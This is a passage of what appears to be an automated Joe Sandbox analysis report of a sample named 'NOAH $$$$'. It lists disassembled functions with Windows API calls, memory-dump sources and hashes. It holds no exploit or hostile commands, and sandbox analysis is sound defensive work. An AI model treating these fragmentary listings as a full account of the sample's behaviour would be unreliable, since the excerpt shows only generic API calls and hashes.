                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2221674350-0
                                                                                                                                        • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                        • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                                        • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                        • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$_wcscat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2037614760-0
                                                                                                                                        • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                                        • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                                                        • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                                        • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                        • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                        • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                        • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 960795272-0
                                                                                                                                        • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                        • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                                        • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                        • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Delete$Copy__fread_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2446588422-0
                                                                                                                                        • Opcode ID: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                                                                                                        • Instruction ID: e3b766f0d7570c057f36e817525b07a345c540c94ec9958bdefdc59333e68e6d
                                                                                                                                        • Opcode Fuzzy Hash: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                                                                                                        • Instruction Fuzzy Hash: D9517CB26083409BC320DF6AD984AAFB7E8FBD9740F10492FF68983201DA75D548CB56
                                                                                                                                        APIs
                                                                                                                                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4189319755-0
                                                                                                                                        • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                        • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                                        • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                        • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1976402638-0
                                                                                                                                        • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                        • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                                        • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                        • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                        • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                        • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                        • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                        • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                        • API String ID: 2487901850-572801152
                                                                                                                                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Enable$Show$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1871949834-0
                                                                                                                                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                        APIs
                                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                                        • SendMessageW.USER32 ref: 00471AE3
                                                                                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3611059338-0
                                                                                                                                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1640429340-0
                                                                                                                                        • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                        • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                                        • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                        • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                        • _wcslen.LIBCMT ref: 004438CD
                                                                                                                                        • _wcslen.LIBCMT ref: 004438E6
                                                                                                                                        • _wcstok.LIBCMT ref: 004438F8
                                                                                                                                        • _wcslen.LIBCMT ref: 0044390C
                                                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                                        • _wcstok.LIBCMT ref: 00443931
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3632110297-0
                                                                                                                                        • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                        • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                                        • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                        • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 752480666-0
                                                                                                                                        • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                        • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                                        • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                        • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
